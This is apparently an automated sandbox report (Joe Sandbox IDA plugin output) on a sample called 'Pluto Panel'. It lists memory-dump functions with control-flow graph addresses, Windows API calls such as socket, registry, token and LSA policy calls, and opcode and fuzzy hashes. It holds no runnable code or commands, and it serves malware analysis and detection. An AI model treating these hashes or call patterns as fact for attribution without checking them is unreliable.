                                                                                                          • Instruction ID: 6a5c785448c08d0a6d9c681b2c735ad5fedb6cac285d5f6bf1ea9cd613131027
                                                                                                          • Opcode Fuzzy Hash: e06aea5f747b1a337e806e37a18ba287783ef2c2e882b00dff0f226d52c4c61a
                                                                                                          • Instruction Fuzzy Hash: DF1125B1504205AFEB10CF60DC84F6AFBACEF04224F08C4AAED05AF251D278A548CFB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 184 3200898-32008c9 185 32008d0-32008fe 184->185 186 32008cb 184->186 187 3200900-3200911 185->187 188 320091b 185->188 186->185 187->188 194 3200913-3200919 187->194 189 3200922-320092e 188->189 190 3200cb2-3200cc6 189->190 191 3200934-320094e 189->191 196 3200954-3200978 191->196 197 3200a1f-3200a42 191->197 194->189 200 320097a-320097d 196->200 201 320097f-3200982 196->201 206 3200a49-3200a6b 197->206 202 3200985-32009af 200->202 201->202 209 32009b1-3200a10 202->209 210 3200a1b-3200a1d 202->210 211 3200a72-3200a75 206->211 212 3200a6d-3200a70 206->212 209->210 210->206 213 3200a78-3200aa7 211->213 212->213 219 3200aa9-3200abd 213->219 220 3200abf 213->220 222 3200ac2 219->222 220->222 225 3200ac9-3200c7c 222->225 228 3200c83-3200c86 225->228 229 3200c7e-3200c81 225->229 230 3200c89-3200ca7 228->230 229->230 230->190
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: :@!q$`5Hq
                                                                                                          • API String ID: 0-4015697240
                                                                                                          • Opcode ID: 810f8b5c3d981fe4be15f8fefd5970de834ff619e04f8a72243a5c918470665c
                                                                                                          • Instruction ID: 0795279b8d13966ac0f2bc77e5384994299a37b78b0bc011a67d58d6cf68ef34
                                                                                                          • Opcode Fuzzy Hash: 810f8b5c3d981fe4be15f8fefd5970de834ff619e04f8a72243a5c918470665c
                                                                                                          • Instruction Fuzzy Hash: 4A910470E11219CFEB14DFA9C894BADBBF2BF48300F148169D509AB3A1DB719989CF10
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 234 167b729-167b731 235 167b733 234->235 236 167b779-167b77c 234->236 237 167b735-167b74c 235->237 238 167b74d-167b75b 235->238 239 167b77d-167b7af 236->239 237->238 238->239 242 167b75d-167b778 238->242 245 167b7b2-167b80a RegQueryValueExW 239->245 242->236 247 167b810-167b826 245->247
                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0167B802
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: 971c032c183749619ac41e83378b018a1dbd52509bd5b9b0c01cd2fadb48a58d
                                                                                                          • Instruction ID: f6e58352288d9ad56344c357b7c1ff5a5bf401b03f5cb71f5ddbf0ec3c4f6b7b
                                                                                                          • Opcode Fuzzy Hash: 971c032c183749619ac41e83378b018a1dbd52509bd5b9b0c01cd2fadb48a58d
                                                                                                          • Instruction Fuzzy Hash: AA41292500E7C0AFD3138B358C65A61BFB4EF47620F0E85DBD9849F5A3D2686909D7B2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 248 167bbf3-167bc82 252 167bc87-167bc93 248->252 253 167bc84 248->253 254 167bc95 252->254 255 167bc98-167bca1 252->255 253->252 254->255 256 167bca3-167bcc7 CreateFileW 255->256 257 167bcf2-167bcf7 255->257 260 167bcf9-167bcfe 256->260 261 167bcc9-167bcef 256->261 257->256 260->261
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0167BCA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 72dd268cfd0ea41a83e2714fb5f64c14260bd616be093f00265ef1b3ec4f11c8
                                                                                                          • Instruction ID: 1338ddd602218bba0edbc65417afafb9c08dc11e07ab56019fe06f3e864cc316
                                                                                                          • Opcode Fuzzy Hash: 72dd268cfd0ea41a83e2714fb5f64c14260bd616be093f00265ef1b3ec4f11c8
                                                                                                          • Instruction Fuzzy Hash: AC319EB2505380AFE722CF25DD45B62BFF8EF06214F08849AE9849F252D375E509CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 264 167ab26-167abb1 268 167abb6-167abcd 264->268 269 167abb3 264->269 271 167ac0f-167ac14 268->271 272 167abcf-167abe2 RegOpenKeyExW 268->272 269->268 271->272 273 167ac16-167ac1b 272->273 274 167abe4-167ac0c 272->274 273->274
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0167ABD5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Open
                                                                                                          • String ID:
                                                                                                          • API String ID: 71445658-0
                                                                                                          • Opcode ID: aed1c6cb927a1dab1da8c5b8942cbbed58b8335d91b4211257d4c1b4e37d4c0a
                                                                                                          • Instruction ID: 59be042eafe7d9031119f5a712ab15b62e81d5d3cfc16b1b4af3c0d81345e263
                                                                                                          • Opcode Fuzzy Hash: aed1c6cb927a1dab1da8c5b8942cbbed58b8335d91b4211257d4c1b4e37d4c0a
                                                                                                          • Instruction Fuzzy Hash: BA31C8B25043846FE7228F65DC45FA7BFBCEF05610F08859AED809B152D264E549CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 279 3231109-3231194 283 3231196 279->283 284 3231199-32311a5 279->284 283->284 285 32311a7-32311af accept 284->285 286 32311f6-32311fb 284->286 287 32311b5-32311cb 285->287 286->285 289 32311fd-3231202 287->289 290 32311cd-32311f3 287->290 289->290
APIs
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: accept
• String ID:
• API String ID: 3005279540-0
• Opcode ID: d5836c71ce9481bf349023666612f9e2d29159670bcb992254aa6fd8051cbc6c
• Instruction ID: b5853b3b28505774c6f73f932a7b5c10f49e3adc03268b5cb32d940a52ac9992
• Opcode Fuzzy Hash: d5836c71ce9481bf349023666612f9e2d29159670bcb992254aa6fd8051cbc6c
• Instruction Fuzzy Hash: 6631AFB1509780AFE712CB25DC45B96FFB8EF06210F0884DAED849F253D365A908CB62
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; entry block 3230c18-3230cad)
APIs
• GetProcessTimes.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230CB5
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: ProcessTimes
• String ID:
• API String ID: 1995159646-0
• Opcode ID: bfc6a2a1940810da80b28b7f5b88162c7670dfc19fc08ef9b277e6f2f0736ee4
• Instruction ID: d4406bcf02c66a2b084ea31566daf3804873522967f13ec722ba9a22ed5fc669
• Opcode Fuzzy Hash: bfc6a2a1940810da80b28b7f5b88162c7670dfc19fc08ef9b277e6f2f0736ee4
• Instruction Fuzzy Hash: A331F7B25093806FE7128F60DC45F96BFB8EF06310F0884DAED859F153D264A549CB71
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; entry block 167ac1d-167ac9b)
APIs
• RegQueryValueExW.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167ACD8
Memory Dump Source
• Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 93551999c63014a851db976bda5e75e402ae2c2bf9030718b4e07c94da3b1184
• Instruction ID: 64350024a9f3baddc87c58c5987dba2f1cebc693e2cc04b8c4b66b9aedc8fa0a
• Opcode Fuzzy Hash: 93551999c63014a851db976bda5e75e402ae2c2bf9030718b4e07c94da3b1184
• Instruction Fuzzy Hash: CF31A475109384AFE722CF65CC44FA6BFB8EF06210F08849AE985DB253D364E549CB71
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; entry block 32305cc-3230676)
APIs
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0
• Opcode ID: b2783a33003aebc131e0d0840756ea38778c73ab2f8cd2d67771fe5c0117e090
• Instruction ID: b010de26b05571882946bb4ce8f5cb2f0f7a077623a13db16e0a92363cbf8b29
• Opcode Fuzzy Hash: b2783a33003aebc131e0d0840756ea38778c73ab2f8cd2d67771fe5c0117e090
• Instruction Fuzzy Hash: DD31C2B2405780AFE722CF55DC85F56FFF8EF06320F08859AE9849B262D364A549CB71
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; entry block 3231204-32312a2)
APIs
• WSAEventSelect.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032312AA
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: EventSelect
• String ID:
• API String ID: 31538577-0
• Opcode ID: e9306b8ce23ce73f19b77ef0c5166ec659998625612d5954d99f2d60c66b99aa
• Instruction ID: 47e9fffa3b50f64232e6fab3e7e580494d6bd5f6c52aaf30645e4fe0ec9effe1
• Opcode Fuzzy Hash: e9306b8ce23ce73f19b77ef0c5166ec659998625612d5954d99f2d60c66b99aa
• Instruction Fuzzy Hash: 463180B24093846FE712CB61DC85F96BFB8EF06220F1984DBE984DF153D228A549CB71
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; entry block 167afcf-167b064)
APIs
• GetTokenInformation.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167B06C
Memory Dump Source
• Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: 50ee40c9f4d508ae2baaca498a3d6663e68af02d141077790a653f5631ed9cf1
• Instruction ID: da5671ed203d27786424000c4a692c5a006e4e431d4f434a33271c71e4c3d091
• Opcode Fuzzy Hash: 50ee40c9f4d508ae2baaca498a3d6663e68af02d141077790a653f5631ed9cf1
• Instruction Fuzzy Hash: 49318171509384AFE7128B65DC45F97BFB8EF06210F0884AFED85DB163D268A508CB72
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; entry block 3230959-32309d5)
APIs
• CreateMutexW.KERNELBASE(?,?), ref: 032309F9
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: CreateMutex
• String ID:
• API String ID: 1964310414-0
• Opcode ID: 2595f07db90cc8fff1e2ad9b604174dbb6873cb360557444effd780a1eb5a456
• Instruction ID: 0442ea19c6e5203946d9b0448d0f37fc36a3e3d47dda9982b71e0333f5d47aa9
• Opcode Fuzzy Hash: 2595f07db90cc8fff1e2ad9b604174dbb6873cb360557444effd780a1eb5a456
• Instruction Fuzzy Hash: BA3180B1509780AFE711CF65DC45B56FFF8EF06210F0884AAED859B292D364E948CB71
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; entry block 167b2f3-167b379)
APIs
• LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0167B38F
Memory Dump Source
• Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
Similarity
• API ID: OpenPolicy
• String ID:
• API String ID: 2030686058-0
• Opcode ID: 0a1335a4a1a5559aa28742bca5df1f2d6076186caec33c76aaeac100cad6b689
• Instruction ID: 934dfb19ee9a77d5e436612c1a72066946b4675631b104daf6ccbe0a238f5a43
• Opcode Fuzzy Hash: 0a1335a4a1a5559aa28742bca5df1f2d6076186caec33c76aaeac100cad6b689
• Instruction Fuzzy Hash: A5219172505284AFE721CF65DC85F6ABFB8EF05220F18889AED849B252D364A548CB61
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; entry block 167a120-167a16f)
APIs
• WSAStartup.WS2_32(?,00000E2C,?,?), ref: 0167A1C2
Memory Dump Source
• Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Opcode ID: 949215777cf923e7576f0359b113794831a3e882daaa81baf1466e07aa1e150e
• Instruction ID: ce728fcec8bb84b134a0cc912b1000ae15a988293c7472c196721f15f31c895d
• Opcode Fuzzy Hash: 949215777cf923e7576f0359b113794831a3e882daaa81baf1466e07aa1e150e
• Instruction Fuzzy Hash: 6F31D37140E3C06FC7028B358C55B62BFB4EF47620F1985DBD9C48F1A3D229A919CBA2
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; single block 32313c1-323149f)
APIs
• CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 0323146E
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: CreateFileMapping
• String ID:
• API String ID: 524692379-0
• Opcode ID: e670fd2353430050fe7a00e665c2bf8cd9864f74b589db164d801fbb5a4fdc24
• Instruction ID: 1b1fbffb7ed316b28c99d719840392f1f8a12fb646893386f12c56ea99761ab0
• Opcode Fuzzy Hash: e670fd2353430050fe7a00e665c2bf8cd9864f74b589db164d801fbb5a4fdc24
• Instruction Fuzzy Hash: 693181715093C15FD3138B35DC55B62BFB8EF47620F1A81DBD8848F553D264A909C7A2
Uniqueness
Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230091
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: e38beed86871228514cc7d5a42e05ad840c302df88306f0cda2b9280b2a30a00
• Instruction ID: d89453de8d26e47114741a43f0f4737e282349b1447b7d5dc17f967313f91080
• Opcode Fuzzy Hash: e38beed86871228514cc7d5a42e05ad840c302df88306f0cda2b9280b2a30a00
• Instruction Fuzzy Hash: B2219272405340AFEB228F51DC40FA6BFBCEF46320F0984AAED459F152D269A949DB71
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileType.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167BD95
Memory Dump Source
• Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: 87a0af897a099451af6891b4b46d829dda8dfa4aa1a09e5f01f0b60b3779cce4
• Instruction ID: 9fe2ff1c6c9e6a13a9c38a3708a46690c8b7b3319b03a838de992c5d2903ed96
• Opcode Fuzzy Hash: 87a0af897a099451af6891b4b46d829dda8dfa4aa1a09e5f01f0b60b3779cce4
• Instruction Fuzzy Hash: 0C2100764087806FE713CB15DC40BA2BFB8EF46720F1885DAED819F153D2586905C771
Uniqueness
Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • WSASocketW.WS2_32(?,?,?,?,?), ref: 0167B8BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Socket
                                                                                                          • String ID:
                                                                                                          • API String ID: 38366605-0
                                                                                                          • Opcode ID: 9c482e39cc3d9cce199f06d94b6dbac7347ea82c13a253a684ad527bf91ecbab
                                                                                                          • Instruction ID: ac7f0333cfe53ab3f22e1a1487eee1d1d8b66150ac8e207515c9fad373ed6076
                                                                                                          • Opcode Fuzzy Hash: 9c482e39cc3d9cce199f06d94b6dbac7347ea82c13a253a684ad527bf91ecbab
                                                                                                          • Instruction Fuzzy Hash: 2D218B71509780AFEB22CF65DC45F56FFB8EF09220F08859EE9859B252D375A408CB62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0167BCA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: b2c23cfafdbbdb612856bd5c0db204652040f3997501966390756280027dea4a
                                                                                                          • Instruction ID: cb7f60c6167e280dadf43a688bcce8d5ce443a48f3539a9aab11064d9883e96d
                                                                                                          • Opcode Fuzzy Hash: b2c23cfafdbbdb612856bd5c0db204652040f3997501966390756280027dea4a
                                                                                                          • Instruction Fuzzy Hash: D6218E71500640AFEB21DF65DD45B66FBE8EF04210F04856AED859B252D775E408CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032302E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: eacf92c09bcc8b94cfccb677e57a6b9e4523358b698181db2bd063e79972c317
                                                                                                          • Instruction ID: f1f67dd141921b806d309ef30b3838f8a6b3a4ec2d0613679d88317a693a60fc
                                                                                                          • Opcode Fuzzy Hash: eacf92c09bcc8b94cfccb677e57a6b9e4523358b698181db2bd063e79972c317
                                                                                                          • Instruction Fuzzy Hash: E2219DB2509341AFE721CF55CC44F57FBB8EF06220F08859AED859B252D268E548CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • getsockname.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230FE3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: getsockname
                                                                                                          • String ID:
                                                                                                          • API String ID: 3358416759-0
                                                                                                          • Opcode ID: b4e21fa745bbafffe8de292d13286baf1985769a6f87f169741869e0041bdbaa
                                                                                                          • Instruction ID: bb91b72a533a3b0138eac1f8c56af9053fbd66584b8cdf34a7b51a6f52deecb6
                                                                                                          • Opcode Fuzzy Hash: b4e21fa745bbafffe8de292d13286baf1985769a6f87f169741869e0041bdbaa
                                                                                                          • Instruction Fuzzy Hash: 0F21B0B1509380AFE721CF61DC44F96FFBCEF46220F0884AAED859F152C268A548CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0167ABD5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Open
                                                                                                          • String ID:
                                                                                                          • API String ID: 71445658-0
                                                                                                          • Opcode ID: 0ce62341729f17b6e0a170926de2d1e754f35f3384d7cd97c6aab563eeb6663d
                                                                                                          • Instruction ID: 3aca68609fa2120d3724623d5b0bde74f6b18d843b7afef105addde3699e671e
                                                                                                          • Opcode Fuzzy Hash: 0ce62341729f17b6e0a170926de2d1e754f35f3384d7cd97c6aab563eeb6663d
                                                                                                          • Instruction Fuzzy Hash: 8021A1B2500604AFE7219F65DC84FABFBECEF04610F08895AED419B251D338E5088AB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • CreateMutexW.KERNELBASE(?,?), ref: 032309F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateMutex
                                                                                                          • String ID:
                                                                                                          • API String ID: 1964310414-0
                                                                                                          • Opcode ID: 215623296edcd9c21eb0a047d6672f05f3579186bc4b15681f03e2310619187b
                                                                                                          • Instruction ID: f68f65b2a32649164c2c14c6f34e65c6c5f87c9862cf9ba98fe6bf945e8b14ae
                                                                                                          • Opcode Fuzzy Hash: 215623296edcd9c21eb0a047d6672f05f3579186bc4b15681f03e2310619187b
                                                                                                          • Instruction Fuzzy Hash: 8121C2B16042419FF720DF65DC45B6AFBE8EF05610F08C4AAED499B242D374E448CB75
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0167B38F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: OpenPolicy
                                                                                                          • String ID:
                                                                                                          • API String ID: 2030686058-0
                                                                                                          • Opcode ID: c223db0bcddc390fdfcbdf467326ac650aad0bf467746b98626339ca22ee768a
                                                                                                          • Instruction ID: 3d35edc0c480f3b9ea5e6a8ef6737e3b79095ca23ef1ce20f0ef91b3f062d1b2
                                                                                                          • Opcode Fuzzy Hash: c223db0bcddc390fdfcbdf467326ac650aad0bf467746b98626339ca22ee768a
                                                                                                          • Instruction Fuzzy Hash: A4219072500204AFEB21DF65EC85F6AFBECEF04620F14896AED85DB241D274E5498F71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • ioctlsocket.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032310BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ioctlsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 3577187118-0
                                                                                                          • Opcode ID: 34d08c912879a71794d50bb8f53e6bfd077b04e6a633b858d8f78ddbac146f96
                                                                                                          • Instruction ID: 0f7ad95da9947d5b05afe234a24db0161e2784668389617dfbae9689133f34d3
                                                                                                          • Opcode Fuzzy Hash: 34d08c912879a71794d50bb8f53e6bfd077b04e6a633b858d8f78ddbac146f96
                                                                                                          • Instruction Fuzzy Hash: D72184714093846FEB12CF55DC45F96FFB8EF46210F0884AAED859F152C268A558CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167ACD8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: 9d142ee465ef6797379588fdd99ec5298005110168a6c9c2d932b8e1e2c8ae65
                                                                                                          • Instruction ID: f5ba74c2842ff4f679f0df0ca1397cc61d2ecd82f5e116b50d730701d1d347e0
                                                                                                          • Opcode Fuzzy Hash: 9d142ee465ef6797379588fdd99ec5298005110168a6c9c2d932b8e1e2c8ae65
                                                                                                          • Instruction Fuzzy Hash: CF219D76600204AFEB20CF65DC85F6BFBECEF04610F08856AED459B251D764E509CE71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetTokenInformation.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167B06C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InformationToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 4114910276-0
                                                                                                          • Opcode ID: 94a13a98f144b8ab20e5c5ca1129f2a33e1cc42729dbec1cf39b0d7289ceee61
                                                                                                          • Instruction ID: 8cbe64cba193d5df95d5b77a413a28c172e00bf086112a842b11bf128a2034a2
                                                                                                          • Opcode Fuzzy Hash: 94a13a98f144b8ab20e5c5ca1129f2a33e1cc42729dbec1cf39b0d7289ceee61
